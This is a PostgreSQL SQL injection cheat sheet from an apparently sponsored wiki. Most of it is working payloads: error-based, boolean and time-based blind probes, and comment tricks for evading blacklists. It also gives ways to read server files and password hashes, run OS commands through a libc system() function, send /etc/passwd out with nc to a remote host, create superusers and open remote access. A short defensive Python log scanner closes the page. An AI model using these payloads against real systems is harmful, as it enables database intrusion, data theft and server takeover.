The SQL Injection Wiki project aims to cover SQL Injection comprehensively. It is a good reference both for seasoned web security professionals and for those who are just starting. The site is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the databases listed below:

The SQL Injection Wiki is sponsored by Netsparker, an automated false-positive-free web vulnerability scanner. Download a free trial.

PostgreSQL SQL Injection Cheat Sheet

Version           SELECT version();
Current User      SELECT user;
                  SELECT current_user;
                  SELECT session_user;
                  SELECT usename FROM pg_user;
                  SELECT getpgusername();
Current Database  SELECT current_database();

Error Based SQLi  For integer inputs: cast((chr(95)||current_database()) as numeric)
                  For string inputs : '||cast((chr(95)||current_database()) as numeric)||'

                  The payloads above raise a conversion error, and the error message quotes the value that failed to convert, here the current database name.
Clear SQLi Tests  These tests are useful for boolean-based SQL injection and for quiet probing.

 product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10

Time Based SQLi

Use this when you cannot see any difference in the output. Do not sleep for more than about 30 seconds, because the application's database connection timeout could easily be reached.

  • ProductID = 1;SELECT pg_sleep(25)--
  • ProductID = 1);SELECT pg_sleep(25)--
  • ProductID = 1';SELECT pg_sleep(25)--
  • ProductID = 1');SELECT pg_sleep(25)--
  • ProductID = 1));SELECT pg_sleep(25)--
  • ProductID = 1'));SELECT pg_sleep(25)--
  • ProductID = SELECT pg_sleep(25)--

Comments

SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'

Bypassing Blacklists with Comments

DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable

Note that PostgreSQL's lexer treats a comment as whitespace, so splitting a keyword as in DR/**/OP yields the tokens DR and OP and a syntax error; only the first form parses in PostgreSQL.

If Statements

An anonymous IF is not allowed; use a CASE expression instead.

SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A

String Without Quotes

SELECT (chr(75)||chr(76)||chr(77));

This returns 'KLM'. (PostgreSQL's function is chr(); CHAR(75) is a type name and does not parse here.)

Reading Local Files

To read data from a local file, first create a temporary table, COPY the file contents into it, then read the data back from the table.

CREATE TABLE temptable(t text);
COPY temptable FROM 'c:/boot.ini';
SELECT * FROM temptable LIMIT 1 OFFSET 0;

This requires the OS-level permissions of the service user that runs the database. By default it is not possible to read arbitrary local files on Windows systems, because the postgres user does not have read permission on them.

Do not forget to drop the temporary table afterwards.

DROP TABLE temptable;

Reading Files with pg_read_file

SELECT pg_read_file('global/pg_hba.conf',0,10000000);

This function can read only files under the DATA directory, and it requires superuser privileges.

Command Execution

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv

SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as the postgres/pgsql OS-level user

Creating Users

CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grants privileges at the same time

CREATEUSER is the old spelling of SUPERUSER; PostgreSQL 9.6 and later accept only SUPERUSER.

Deleting Users

DROP USER test1; -- priv

Granting Privileges

ALTER USER test1 CREATEUSER CREATEDB; -- priv

Enabling Remote Access

Add a "host" record to the pg_hba.conf file located in the DATA directory; the server must reload its configuration before the record takes effect.

host     all     all     192.168.20.0/24     md5

Password Hashes

SELECT pg_read_file('global/pg_auth',0,10000000);

Listing Databases

SELECT pg_read_file('global/pg_database',0,10000000);

Default Databases

template0
template1

Locating the DATA Directory

SELECT current_setting('data_directory'); -- priv
returns: C:/Program Files/PostgreSQL/8.3/data

SELECT current_setting('hba_file'); -- priv
returns: C:/Program Files/PostgreSQL/8.3/data/pg_hba.conf

Time-Based Blind SQLi

?vulnerableParam=-1; SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({INJECTION}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+

{INJECTION} = the query you want to run.

If the condition is true, the response arrives after 14 seconds; if it is false, the response is delayed for one second.
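As an added, defender-side example that is not part of the original cheat sheet: a small Python scanner that URL-decodes request lines from a constructed access log and flags the payload shapes listed above (stacked pg_sleep probes, CASE WHEN time-based probes, tautologies, comment terminators), treating a sleep payload paired with an abnormally slow response as evidence that the probe actually executed. The log format, field order and the 10-second threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines: method, path+query, status, response time in ms.
# The probes mirror the payloads on this page; the timings are made up.
SAMPLE_LOG = """\
GET /product.php?id=4 200 35
GET /product.php?id=4%20OR%201%3D1 200 41
GET /product.php?id=1;SELECT%20pg_sleep(25)-- 200 25102
GET /product.php?id=-1;%20SELECT%20CASE%20WHEN%20(COALESCE(ASCII(SUBSTR((SELECT%20usename%20FROM%20pg_user),1,1)),0)%20%3E%20100)%20THEN%20pg_sleep(14)%20ELSE%20pg_sleep(0)%20END%20LIMIT%201--+ 200 14077
GET /product.php?id=5 200 30
"""

# Signatures taken from the payload shapes shown on this page.
PATTERNS = {
    "pg_sleep":      re.compile(r"pg_sleep\s*\(", re.I),
    "case_when":     re.compile(r"\bCASE\s+WHEN\b", re.I),
    "sql_comment":   re.compile(r"--|/\*.*?\*/", re.S),
    "tautology":     re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I),
    "stacked_query": re.compile(r";\s*SELECT\b", re.I),
}

SLOW_MS = 10_000  # pg_sleep(14) or pg_sleep(25) pushes latency into the tens of seconds

def analyse_line(line):
    """Return (decoded_target, findings) for one log line; findings is a sorted list."""
    _method, target, _status, ms = line.split()
    decoded = unquote_plus(target)  # decode %XX and '+' so the SQL is visible
    findings = {name for name, rx in PATTERNS.items() if rx.search(decoded)}
    # A sleep payload plus an abnormally slow response indicates the probe executed.
    if "pg_sleep" in findings and int(ms) >= SLOW_MS:
        findings.add("time_based_executed")
    return decoded, sorted(findings)

def scan(log_text):
    """Scan a whole log and return only the requests that triggered a signature."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            decoded, findings = analyse_line(line)
            if findings:
                hits.append((decoded, findings))
    return hits

if __name__ == "__main__":
    for decoded, findings in scan(SAMPLE_LOG):
        print(", ".join(findings), "<-", decoded)
```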